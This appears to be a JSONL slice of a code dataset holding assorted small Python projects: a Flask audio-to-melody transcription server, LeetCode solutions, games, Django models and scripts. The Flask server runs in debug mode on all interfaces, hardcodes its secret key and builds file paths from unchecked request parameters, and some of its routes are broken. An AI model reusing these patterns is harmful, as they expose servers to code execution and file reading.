Build a root-level catalog that links to other catalogs, and return the\n XML as a string\n\n :param cat_paths: paths to dataset xml records\n :type cat_paths: list\n\n :param root_dir: the location of the root catalog.xml\n :type root_dir: str\n\n :param name: name of root catalog\n :type name: str\n\n :return: XML String\n :rtype: str\n \"\"\"\n catalogs = []\n\n for path in cat_paths:\n cat_name = get_catalog_name(path)\n\n # href must be relative to the root catalog itself\n href = os.path.relpath(path, start=root_dir)\n catalogs.append(CatalogRef(name=cat_name, title=cat_name,\n href=href))\n\n return self.render(\"root_catalog.xml\", name=name, catalogs=catalogs)","repo_name":"cedadev/cci-publisher","sub_path":"cci_publisher/datasets/create_catalog.py","file_name":"create_catalog.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33364207586","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\n\nclass Solution:\n def __init__(self) :\n self.preorder_index = 0\n self.preorder = None\n\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n\n hashmap = {num : i for i, num in enumerate(inorder)}\n self.preorder = preorder\n\n def _buildTree(left, right) :\n if left > right :\n return\n\n rootval = self.preorder[self.preorder_index]\n root = TreeNode(rootval)\n\n self.preorder_index += 1 \n\n next_right = hashmap[rootval]\n root.left = _buildTree(left, next_right - 1)\n root.right = _buildTree(next_right + 1, right)\n\n return root\n \n return _buildTree(0, len(inorder) - 1)\n","repo_name":"watanka/leetcode","sub_path":"0105-construct-binary-tree-from-preorder-and-inorder-traversal/0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"23999047907","text":"from __future__ import unicode_literals\nfrom concurrent.futures import process\nfrom flask import Flask, jsonify, render_template, request,json,send_from_directory, flash, url_for, redirect, session,send_file,redirect\nfrom flask_wtf import FlaskForm\nfrom wtforms import SelectField,HiddenField,SubmitField,FieldList,FormField\nimport vamp\nimport librosa\nimport ffmpeg\nimport os\nimport pyin\nimport subprocess\nimport pretty_midi\nfrom madmom.features.downbeats import DBNDownBeatTrackingProcessor,RNNDownBeatProcessor\nimport pandas as pd\nfrom functools import wraps\nfrom wtforms import Form, BooleanField, TextField, PasswordField, validators,RadioField\nimport gc\nimport math\nimport requests\nimport sys,traceback\nfrom pathlib import Path\nimport pydub\nfrom pydub import AudioSegment\nfrom IPython.display import Audio\nimport numpy as np\nimport scipy as sp\nimport scipy.signal\nfrom scipy.io.wavfile import write\nimport os.path\nimport time\n\n\n# from spleeter.separator import Separator\n\n\napp = Flask(__name__)\napp.config['SESSION_TYPE'] = 'memcached'\napp.config['SECRET_KEY'] = 'pretty secret key'\nUPLOAD_FOLDER = './static/audio_uploads'\nSTEMS_FOLDER = './static/stems'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['STEMS_FOLDER'] = STEMS_FOLDER\n#dev_mode = 'TRUE'\n#print(\"fn \",Flask(__name__))\n\n\n# @app.route('/api//')\n# def api_get_filepath(filepath):\n# return json.jsonify({\n# 'filepath': filepath\n# })\n\ndef separate_stems(filePath,fileName):\n print(\"\\nseparating stems\")\n # sep = Separator('spleeter:2stems')\n print(\"separator ran\")\n # sep.separate_to_file(file_path,output_path,codec='mp3')\n print(\"we do be having issues if this doesnt show\")\n\n outputPath = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/\" + fileName.replace(\".wav\", \"\") + \"/bass.wav\"\n\n print(filePath)\n\n # WE USE SUBPROCESS NOW::\n\n demucsCommand = \"demucs -d cpu -n mdx_q \"\n\n subprocess.run(demucsCommand+filePath)\n\n return(outputPath)\n\n # return render_template('play_audio.html',filename=filePath)\n\n\n\n # subprocessCommand = \"spleeter separate -p spleeter:4stems -o output/ \"\n # print(filePath)\n # print(subprocessCommand+filePath)\n # subprocess.run(subprocessCommand+filePath)\n\n # if __name__ == \"__main__\": \n # separator = Separator('spleeter:2stems')\n # separator.separate_to_file(filePath, outputPath)\n # print('sep is running')\n\n # print('subprocess is done now')\n# @app.route(\"/change_audio\")\n# def change_audio(filePath, sample):\n# return filePath, sample\n\n\n#reading in stems from demucs separation\n\ndef bass_stem_definitions(path_to_bass,path_to_orig):\n [stem,sr1] = librosa.load(path_to_bass) #### path for bass stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song\n\n #lowpass filter to remove extraneous signal noise\n lowpass = scipy.signal.butter(2, 5000, 'lowpass', fs=sr1, output='sos')\n filtered = scipy.signal.sosfilt(lowpass, stem)\n return filtered, original,sr1\n\n\ndef vocals_stem_definitions(path_to_vocals,path_to_orig):\n [stem,sr1] = librosa.load(path_to_vocals) #### path for vocals stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song \n\n #highpass filter to remove extraneous signal noise\n highpass = scipy.signal.butter(2, 5000, 'highpass', fs=sr1, output='sos')\n filtered = scipy.signal.sosfilt(highpass, stem)\n return filtered, original,sr1\n\n\n#process single wav pyin\ndef process_video(videoid):\n \n base_fn = videoid 
\n #decode_fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/stems/bass.wav'\n print(\"base_fn: \", base_fn)\n try:\n data,rate = librosa.load(base_fn)\n except Exception as bad_file:\n print(bad_file)\n return \"failure1\"\n \n melody = vamp.collect(data,rate,\"pyin:pyin\")\n parm = {}\n #plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"mtg-melodia:melodiaviz\",parm)\n plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"pyin:pyin\",parm)\n output_desc = plugin.get_output(5)\n print(\"od\",output_desc)\n output = output_desc[\"identifier\"]\n ff = vamp.frames.frames_from_array(data, step_size, block_size)\n results = vamp.process.process_with_initialised_plugin(ff, rate, step_size, plugin, [output])\n print(\"results:\", results)\n melody_tmp_fn = base_fn + \".lab\"\n print(\"melody_tmp: \", melody_tmp_fn)\n outfile = open(melody_tmp_fn,'w') \n try:\n result = next(results)\n except Exception as ex:\n print(\"failure2\",ex)\n return \"failure3\" \n\n while True:\n \n start = str(result['notes']['timestamp'])\n freq = result['notes']['values'][0]\n note_nbr = midi = str(round(69 + 12*np.log2(freq/440.)))\n duration = str(result['notes']['duration']) \n if result['notes']['values'].shape[0] > 1:\n print(\"multiple notes\",videoid)\n outfile.write(start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n #print(\"??\",start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n try:\n \n result = next(results) \n \n except:\n #outfile.write(start + '\\t' + duration + '\\t' + note_nbr )\n break\n \n outfile.close()\n\n\n #infile = melody_tmp_fn\n #melody_fn = base_fn + '.lab' \n #audio_to_midi_melodia(infile, melody_fn, 95)\n \n \n return melody_tmp_fn\n\n\n#convert pyin to midi\ndef convert_to_midi(note_matrix):\n song1 = pretty_midi.PrettyMIDI()\n # Create an Instrument instance for a cello instrument\n song1_program = pretty_midi.instrument_name_to_program('Acoustic Grand Piano')\n piano = pretty_midi.Instrument(program=song1_program)\n for row in note_matrix:\n song_id = row[0]\n note_number = int(row[3])\n start_time = float(row[1])\n end_time = float(row[2])\n note = pretty_midi.Note(velocity=100, pitch=note_number, start=start_time, end=end_time)\n piano.notes.append(note)\n song1.instruments.append(piano)\n # Write out the MIDI data\n song1.write(song_id + '_midi.mid')\n\n return 'success'\n\n#Get song data and beat tracker\ndef get_song_data(track_id,videoid):\n \n print(\"song_id \",track_id)\n base_fn = videoid\n ###### Figure out the name of the file to open based on the track_id supplied\n fn = track_id\n transcription_file = open(fn)\n pitch_vector=[]\n midipitches = ['C','C#','D','Eb','E','F','F#','G','G#','A','Bb','B']\n for row in transcription_file.readlines():\n row = row.split('\\t')\n start_time = float(row[0].strip(\" \"))\n end_time = start_time + float(row[1].strip(\" \"))\n duration = end_time - start_time\n note_nbr = int(row[2].strip(\"\\n\"))\n pcname = midipitches[note_nbr % 12]\n octave = int((note_nbr / 12) + 1)\n pitch_vector.append([start_time,duration,note_nbr,pcname,octave])\n pitchdf = pd.DataFrame(pitch_vector,columns=['start','duration','notenbr','pcname','octave'])\n \n\n beat_vector = []\n nbrbeats = 0\n\n ######need to implement madmom beat tracker to get bpm\n ######read beat tracker file to get beats \n\n #beat_fn = './capstone2/madmombeats/' + videoid.replace(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water\", \"\") + '.lab'\n proc = 
DBNDownBeatTrackingProcessor(beats_per_bar=[3,4], fps=100)\n    act = RNNDownBeatProcessor()(base_fn)\n    beatarray = proc(act)\n    print(\"out \",beatarray)\n    #outfile = open(beat_fn,'w')\n    x = 0\n    firststart = 0\n\n    #for c in beatarray:\n    #    if x == 0:\n    #        firststart = c[0]\n    #        x += 1\n    #        continue\n    #    outfile.write(str(np.round(firststart,2)))\n    #    outfile.write('\\t')\n    #    firststart = c[0]\n    #    outfile.write(str(np.round(c[0],2)))\n    #    outfile.write('\\t')\n    #    outfile.write(str(np.round(c[1],2)))\n    #    outfile.write('\\t')\n    #    if x < len(beatarray) -1:\n    #        outfile.write('\\n')\n    #    x += 1\n    #outfile.close()\n\n    previous_start = 0\n    for row in range(len(beatarray)):\n        if row == 0:\n            previous_start = float(beatarray[row][0])\n            beat_vector.append([float(beatarray[row][0]),float(0),beatarray[row][1],'beat'])\n            nbrbeats += 1\n        else:\n            previous_start = float(beatarray[row-1][0])\n            beat_vector.append([float(beatarray[row][0]),float(beatarray[row][0])-previous_start,beatarray[row][1],'beat'])\n            nbrbeats += 1\n\n    beatdf = pd.DataFrame(beat_vector,columns=['start','duration','metric_pos','type'])\n    beatdf['duration'].fillna(value=beatdf.duration.mean)\n    songlen = beatdf.start.max() + beatdf.duration.iloc[beatdf.start.idxmax()]\n    bpm = nbrbeats / (songlen / 60)\n    print(\"songlen \", songlen, bpm)\n\n    meanbeat = beatdf['duration'].mean()/4 ##### divide beat into sixteenth notes\n    pitchdf['notelen'] = np.ceil(pitchdf['duration'] / meanbeat).astype(int).astype(str) + \"n\"\n    pitchdf['16s'] = np.round(pitchdf['start'] / meanbeat)\n    pitchdf['notestart'] = np.floor(np.round(pitchdf.start / meanbeat) / 16).astype(int)\n    pitchdf['notestart4'] = (np.floor(np.round(pitchdf.start / meanbeat) - (pitchdf.notestart) * 16) / 4).astype(int)\n    pitchdf['notestart16'] = (np.round(pitchdf.start / meanbeat) - ((pitchdf.notestart * 16) + (pitchdf.notestart4 * 4 ))).astype(int)\n    pitchdf['notestartarray'] = pitchdf['notestart'].map(str) + \":\" + pitchdf['notestart4'].map(str) + \":\" + pitchdf['notestart16'].map(str)\n    pitchdf['notename'] = pitchdf['pcname'] + pitchdf['octave'].map(str)\n    notearray = pitchdf[['notestartarray','notename','notelen']].to_numpy()\n    pitchdf['notearray'] = notearray.tolist()\n    print(\"nnn\",pitchdf[['notearray','duration','notelen']].head(10))\n    pitchdf.to_json(base_fn + \"_pitchdf.json\")\n    print(pitchdf)\n    return pitchdf, bpm\n\n\n# leftover test harness, kept fully commented out so the module imports cleanly\n#if __name__ == '__main__':\n    #outputpath = separate_stems(UPLOAD_FOLDER,)\n    #target_wav = bass_stem_definitions(outputpath,path_to_orig)\n    #target_wav = 'bass.wav'\n    #rc = process_video(target_wav)\n    #print(\"rc\",rc,target_wav)\n\n# if __name__ == \"__main__\":\n#     fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/pyin/basslemon.wav.lab'\n#     transcription_file = open(fn)\n#     note_matrix = []\n#     for row in transcription_file.readlines():\n#         row = row.split('\\t')\n#         song_id = 'bass'\n#         start_time = float(row[0].strip(\" \"))\n#         end_time = start_time + float(row[1].strip(\" \"))\n#         note_nbr = int(row[2].strip(\"\\n\"))\n#         note_matrix.append([song_id,' ',start_time,end_time,note_nbr])\n#     # convert_to_midi(note_matrix)\n\n\n@app.route('/audio_file_name')\ndef returnAudioFile(filePath):\n    path_to_audio_file = filePath\n    return send_file(\n        path_to_audio_file,\n        mimetype=\"audio/wav\",\n        as_attachment=True,\n        attachment_filename=\"test.wav\")\n\n@app.route('/upload')\ndef audio_upload():\n    return render_template('upload.html')\n\n@app.route(\"/\")\ndef landing_load():\n    return render_template(\"melody-editor.html\")\n\n@app.route('/explore')\ndef explore():\n    ytid = 
request.args.get('ytid')\n    if ytid == None:\n        return render_template('melody-editor.html')\n    else:\n        return render_template('melody-editor.html',ytid=ytid)\n    #return render_template('pixi-explore.html')\n\n@app.route('/get_song',methods=['GET', 'POST'])\ndef create_time_series():\n    song_id = request.args.get('song_id')\n    song_title = request.args.get('title')\n    chord_type = request.args.get('chord_type')\n    midi_id = request.args.get('midi_id')\n    print(\"midi id \",midi_id)\n    songtitles,titleoptions = refresh_song_titles()\n    if song_id == None:\n        print(\"using title\")\n        track_id=songtitles.loc[songtitles.loc[:,'Title']==song_title,'ChordinoFN'].values[0]\n    else:\n        track_id=songtitles.loc[songtitles.loc[:,'YoutubeID']==song_id,'ChordinoFN'].values[0]\n    userid = request.args.get('userid')\n    pitchdf,chorddf,secdf,songlen,bpm,beatdf,chordlist = get_song_data(track_id,chord_type,userid,midi_id)\n    #firstdownbeat,signature,nbr_sixteenths = get_downbeat(beatdf,chordlist)\n    beatlist = beatdf.start.tolist()\n    nbr_rows = math.ceil(float(len(beatlist)) / (nbr_sixteenths))\n    lyric_lines,lyricdf = get_lyrics(song_id,beatlist,nbr_rows,signature,beatdf)\n    #print(\"ldf\",lyricdf)\n    lyricl = lyricdf.to_dict(orient='records')\n    # if firstdownbeat > 0:\n    #     emptybeats = [\" \" for i in range(signature - firstdownbeat)]\n    #     chordlist = emptybeats + chordlist\n    #     print(\"empty\",emptybeats)\n    print(\"cdf\",pitchdf['notearray'].head())\n    cdictlist = []\n    notelist = pitchdf['notearray'].tolist()\n    chord_tone_array = []\n    note_index = 0\n    note_beat_measure = (int(notelist[note_index][0].split(':')[0]) * signature) + (int(notelist[note_index][0].split(':')[1]))\n\n    #print(\"chordl\",chordl)\n    pitchl = pitchdf.to_dict(orient='records')\n    secl = secdf.to_dict(orient='records')\n    #print(\"secl \",secl)\n    D = {'data1' : pitchl, 'songlen' : songlen, 'bpm' : bpm,\n        'downbeat': str(firstdownbeat), 'signature': str(signature),'lyrics': lyricl,'cta' : chord_tone_array}\n\n    return jsonify(D)\n\n\n@app.route(\"/edu\")\ndef edu():\n    return render_template(\"edu.html\")\n\n\n\n@app.route('/<path:filename>')\ndef serve_static(filename):\n    print('serving static')\n    root_dir = app.root_path\n    print(\"root \",root_dir,app.root_path,app.instance_path)\n    filedir = os.path.join(root_dir, 'static/')\n    print(filedir,filename)\n    return send_from_directory(os.path.join(root_dir, 'static/'), filename)\n\n\n# @app.route('/play_audio')\n# def play_audio():\n#     return render_template('play_audio.html')\n\n@app.route('/save_melody',methods=['GET','POST'])\ndef save_melody():\n    request_data = request.get_json(silent = True)\n    print(\"requestdata: \",request_data)\n    melody_data = request_data[\"melody_data\"]\n    song_id = request_data[\"song_id\"]\n    print(\"songid:\", song_id)\n    note_matrix = []\n    for x in range(len(melody_data)):\n        end_time = melody_data[x][0] + melody_data[x][1]\n        note_nbr = melody_data[x][2]\n        note_matrix.append([song_id,melody_data[x][0],end_time,note_nbr])\n    convert_to_midi(note_matrix)\n    return \"success\"\n\n\n@app.route('/save_audio',methods=['GET','POST'])\ndef save_audio():\n    print(\"request title\", request.args.get(\"title\"))\n    print(\"request type\", request.args.get(\"type\"))\n    file_name = request.args.get(\"title\")\n    type = request.args.get(\"type\")\n    print(\"filename\", file_name)\n    print(\"type\", type)\n\n    if file_name != None:\n        # this saves audio files into the \"audio_uploads\" folder. 
we will need to delete these in a cache on the webhosting possibly but for now it works fine\n #audio_file = request.files['audio']\n #print('audiofile: ', audio_file.filename)\n #print('newaudiofile: ', audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1))\n\n #file_id=audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1)\n #print(\"fileid\", file_id)\n # file_path = UPLOAD_FOLDER + \"/\" + file_id\n # output_path = STEMS_FOLDER + \"/\" + file_id\n #orig_file_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/audio_uploads/\"+ file_name + \".wav\"\n \n\n #print(\"file path: \", orig_file_path)\n #print(\"output path\", output_path)\n #audio_file.save(orig_file_path) \n\n # convert file to wav for future use\n\n #orig_file_path = '\"' + orig_file_path + '\"'\n\n #output_path = separate_stems(orig_file_path, file_id)\n #output_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav\"\n\n #if \".mp3\" in orig_file_path:\n # print('yes there is mp3 here')\n # sound = AudioSegment.from_mp3(orig_file_path)\n # sound.export(orig_file_path.replace(\".mp3\",\".wav\"), format=\"wav\")\n # file_id = file_id.replace(\".mp3\",\".wav\")\n # orig_file_path = orig_file_path.replace(\".mp3\",\".wav\")\n\n #melody_fn = process_video(output_path)\n #melody_fn = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav.lab\"\n\n #pitch_df,bpm = get_song_data(melody_fn,output_path)\n pitch_df = pd.read_json(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/processed/pitchdf/\" + file_name + \"/\" + type + \".wav_pitchdf.json\")\n \n bpm = pitch_df.bpm.mean()\n print(\"bpm: \", bpm)\n\n #name_of_file=file_id.split(\".\")[0]\n #bass_path = 'separated/mdx_q/'+ name_of_file + '/bass.wav'\n #vocals_path = 'separated/mdx_q/'+ name_of_file + '/vocals.wav'\n\n #stereo,sr=binauralizer(alpha,high,bass_path,orig_file_path)\n #binauralized_file_path = 'static/binauralized/' + file_id\n #write(binauralized_file_path,sr,stereo)\n #print(binauralized_file_path)\n pitchl = pitch_df.to_dict(orient='records')\n D = {'data1' : pitchl, 'bpm' : bpm }\n #return render_template('melody-editor.html', ytid=D) \n return jsonify(D) \n \n\n \n # return render_template('play_audio.html', file_path=binauralized_file_path)\n\n\n#testcase \n#process_video(path_to_bass)\n#write(\"stereo.wav\",sr,stereo)\n\n\n\nif __name__ == '__main__':\n #app = Flask(__name__)\n #sess = Session()\n dev_mode = 'TRUE'\n if dev_mode == 'TRUE':\n app.run(host='0.0.0.0',port=8100,debug=True)\n else:\n app.run()\n \n\n\n \n\n \n","repo_name":"dhanson007/MidiMelodyTranscriber","sub_path":"song_upload_server.py","file_name":"song_upload_server.py","file_ext":"py","file_size_in_byte":17683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26663837310","text":"import random\nfrom wordlist import words\nimport string\nimport hangmangraphics\nimport time\nimport sys\n\ndef get_valid_word(words):\n word = random.choice(words)\n while '-' in word or ' ' in word:\n word = random.choice(words)\n return word\n\ndef hangman():\n word = get_valid_word(words).upper()\n word_letters = set(word)\n alphabet = set(string.ascii_uppercase)\n used_letters = set()\n lives = 6\n hangmangraphics.draw_hangman(lives) \n while len(word_letters) > 0 and lives > 0:\n print('You have',lives,' lives and You have used these letters', ' '.join(used_letters))\n\n word_list = [letter if letter in used_letters else '-' for letter in word]\n print('Current word: ', ' '.join(word_list))\n\n user_letter = input('Guess a letter: ').upper()\n if user_letter in alphabet - used_letters:\n used_letters.add(user_letter)\n if user_letter in word_letters:\n word_letters.remove(user_letter)\n else:\n lives = lives - 1\n hangmangraphics.draw_hangman(lives)\n print('this letter is not in the word')\n\n\n elif user_letter in used_letters:\n print('You have used that character before')\n\n else: \n print(\"invalid character, try again\")\n \n if lives == 0:\n print('You didnt guess the word, it was: ',word)\n else:\n print('You guessed it, the word is: ',word,'!')\n\nhangman()\ntime.sleep(5)\nprint(\"Press any key to exit the program\")\ninput()\nexit()","repo_name":"HyperDarkmoon/Hangman-python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27569845367","text":"from django.db import models\nfrom account.models import AccountUser, WorkPlace\nfrom django.urls import reverse\nfrom django.template.defaultfilters import slugify\n\nstatus = (\n ('ass', 'Assigned'),\n ('prog', 'In Progress'),\n ('comp', 'Completed'),\n ('test', 'Testing'),\n ('rev', 'Review'),\n ('appr', 'Approved'),\n ('rel', 'Released')\n)\n\n# Create your models here.\n\nclass Project(models.Model):\n workplace_id = models.ForeignKey(WorkPlace, on_delete=models.CASCADE)\n project_manager = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=255)\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n slug = models.SlugField(null=False, unique=True)\n\n def __str__(self):\n return self.name\n\n def assigned(self):\n var = Status.objects.get(status='ass')\n return self.tasks_set.filter(status_id_id=var)\n\n def progress(self):\n var = Status.objects.get(status='prog')\n return self.tasks_set.filter(status_id_id=var)\n\n def completed(self):\n var = Status.objects.get(status='comp')\n return self.tasks_set.filter(status_id_id=var)\n\n def testing(self):\n var = Status.objects.get(status='test')\n return self.tasks_set.filter(status_id_id=var)\n\n def review(self):\n var = Status.objects.get(status='rev')\n return self.tasks_set.filter(status_id_id=var)\n\n def approved(self):\n var = Status.objects.get(status='appr')\n return self.tasks_set.filter(status_id_id=var)\n\n def released(self):\n var = Status.objects.get(status='rel')\n return self.tasks_set.filter(status_id_id=var)\n\n def get_absolute_url(self):\n return reverse('projects:project-detail', kwargs={'workplace_id': self.workplace_id, 'slug': self.slug})\n\n def save(self, *args, **kwargs): # new\n if not self.slug:\n self.slug = slugify(self.name)\n return super().save(*args, **kwargs)\n\n\nclass Status(models.Model):\n status = models.CharField(max_length=15, choices=status, null=True, blank=True)\n\n def __str__(self):\n return self.status\n\n\nclass Tasks(models.Model):\n project_id = models.ForeignKey(Project, on_delete=models.CASCADE)\n user_id = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n status_id = models.ForeignKey(Status, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=256)\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n\nclass Logs(models.Model):\n task_id = models.ForeignKey(Tasks, on_delete=models.CASCADE)\n messages = models.TextField()\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n def __str__(self):\n return self.messages\n","repo_name":"Akoh1/project-management","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27259978802","text":"from collections import defaultdict\nfrom graph import Graph\nimport os\nd = defaultdict(list)\nV, E = [int(x) for x in input('Nhập số đỉnh và cạnh trên một dòng:').split()]\nfor i in range(V):\n d[i] = []\ngraph = Graph(d)\nedges = []\nfor i in range(E):\n\n u, w = [int(x) for x in input('Nhập cạnh %d trên một dòng:' %(i+1)).split()]\n graph.graph[u - 1].append(w - 1)\n graph.graph[w - 1].append(u - 1)\n edge = [u, w]\n edges.append(edge)\n\nout = dict(zip(range(V), [0]*V))\nlayers = graph.bfs(0)\nis_even = 0\ncolors = [0, 1]\n\nfor i in layers:\n for ii in i:\n out[ii] = 1*is_even\n is_even = 1-is_even\nfor v in range(V):\n temp_colors = colors.copy()\n for next_v in graph.graph[v]:\n try:\n temp_colors.remove(out[next_v])\n except ValueError:\n pass\n if len(temp_colors) == 0:\n out[v] = colors[-1] + 1\n colors.append(out[v])\ncolors_list = ['black', 'red', 'blue', 'yellow', 'green', 'white', 'pink', 'ivory', 'gray', 'cyan', 'gold', 'tan', 'brown', 'orange', 'coral', 'maroon']\ntry:\n os.remove('dothitomau.dot')\nexcept FileNotFoundError:\n pass\nf = open('dothitomau.dot', 'w+')\nf.write('graph dothi\\n{\\n')\nfor i in range(V):\n f.write('%d [fillcolor=%s, style=filled];\\n' % (i+1, colors_list[out[i]]))\nfor i in edges:\n f.write('%d -- %d;\\n' % (i[0], i[1]))\nf.write('}')\nf.close()\n\n\n\n\n","repo_name":"catShaark/b-a-i-t-a-p-t-o-a-n-r-o-i-r-a-c","sub_path":"coloring.py","file_name":"coloring.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70751813172","text":"class WordDistance:\n\n def __init__(self, wordsDict: List[str]):\n self.dic=defaultdict(list)\n for i, w in enumerate(wordsDict):\n self.dic[w].append(i)\n\n def shortest(self, word1: str, word2: str) -> int:\n list1,list2=self.dic[word1],self.dic[word2]\n i=j=0\n res=math.inf\n while i 80:\n hasil = 'A'\nelif nilai <= 80 and nilai >= 76:\n hasil = 'AB'\nelif nilai <= 75 and nilai >= 71:\n hasil = 'B'\nelif nilai <= 70 and nilai >= 66:\n hasil = 'BC'\nelif nilai <=65 and nilai >= 56:\n hasil = 'C'\nelif nilai <=55 and nilai >= 51:\n hasil = 'CD'\nelif nilai <=50 and nilai > 45:\n hasil = 'D'\nelif nilai <=45 and nilai >= 41:\n hasil = 'ED'\nelif nilai <=40 and nilai >= 0:\n hasil = 'E'\nelse:\n print('Masukkan angka dibawah 100 saja!!!')\n \nprint('Nilai {} = {}'.format(nilai, hasil))\n\n","repo_name":"WebsiteThufail/kelola-angka","sub_path":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_name":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14036866930","text":"import socket\n\nclass Client():\n def __init__(self, host, port):\n self._HOST = host\n self._PORT = port\n \n def send(self, msg):\n self.__client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.__client.connect((self._HOST, self._PORT))\n message = msg.encode()\n self.__client.send(message) # Send message to server\n response = self.__client.recv(1024).decode()\n self.__client.close()\n return response\n","repo_name":"OtavioFSantos/email-protocol","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39757116236","text":"# read input as list of starting sequences\r\ninp = [[int(x) for x in line.strip().split(',')] for line in open('input.txt')]\r\n\r\n\r\ndef rambunctious_recitation(seq, end):\r\n # first n-1 starting numbers append into dict\r\n # the number itself is a key, turn is a value\r\n spoken_nums = {n:turn+1 for turn,n in enumerate(seq[:-1])}\r\n # n-th starting number\r\n spoken = seq[-1]\r\n for turn in range(len(spoken_nums)+1, end):\r\n # if spoken number is not in a set of spoken numbers\r\n if spoken not in spoken_nums:\r\n # add a number into the set\r\n spoken_nums[spoken] = turn\r\n # the next spoken number is 0\r\n spoken = 0\r\n # else spoken number is already in spoken numbers\r\n else:\r\n most_recently_turn = spoken_nums[spoken]\r\n # update turn for a given number\r\n spoken_nums[spoken] = turn\r\n # the next spoken number will be 'age'\r\n # (the time a number was most recently spoken\r\n # before)\r\n spoken = turn - most_recently_turn\r\n return spoken\r\n\r\n\r\n# part 1\r\nprint(\"2020th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n print(f'\\t{seq} -->', rambunctious_recitation(seq, 2020))\r\nprint()\r\n\r\n# part 2\r\nprint(\"30000000th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n print(f'\\t{seq} -->', rambunctious_recitation(seq, 30000000))\r\nprint()\r\n","repo_name":"matusjokay/adventofcode","sub_path":"2020/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"4313614544","text":"import argparse\nimport glob\nimport json\n\n\ndef create_jsonl_file(input_dir, output_dir):\n # Initialize an empty list to store the dictionaries\n data = []\n\n # Get a list of all the .txt files in the input directory\n txt_files = glob.glob(f\"{input_dir}/*.txt\")\n\n # Loop through each file and extract the data\n for txt_file in txt_files:\n # Open the file and read the lines\n with open(txt_file, \"r\") as f:\n lines = f.readlines()\n\n # Extract the conversation lines by removing the *Action* lines\n conversation = []\n for line in lines:\n if \"*Action*\" not in line:\n conversation.append(line.strip())\n\n # Combine the conversation lines into a single string\n conversation_str = \"\\n\".join(conversation)\n\n # Create a dictionary with the conversation string as the input and an empty output and a reward of 1.0\n data_dict = {\"input\": conversation_str, \"output\": \"\", \"reward\": 1.0}\n\n # Add the dictionary to the data list\n data.append(data_dict)\n\n # Write the data list to a jsonl file\n with open(f\"{output_dir}/output.jsonl\", \"w\") as f:\n for data_dict in data:\n # Remove any lines that start with the = sign in the output\n output_lines = data_dict[\"output\"].split(\"\\n\")\n output_lines = [line for line in output_lines if not line.startswith(\"=\")]\n output_str = \"\\n\".join(output_lines)\n\n # Update the data dictionary with the cleaned output\n data_dict[\"output\"] = output_str\n\n # Write the updated dictionary to the file\n json.dump(data_dict, f)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Organize training data for Pyg-style chat models.\")\n parser.add_argument(\"--input\", type=str, help=\"Input directory containing .txt files.\")\n parser.add_argument(\"--output\", type=str, help=\"Output directory to write output.jsonl file to.\")\n args = parser.parse_args()\n\n create_jsonl_file(args.input, 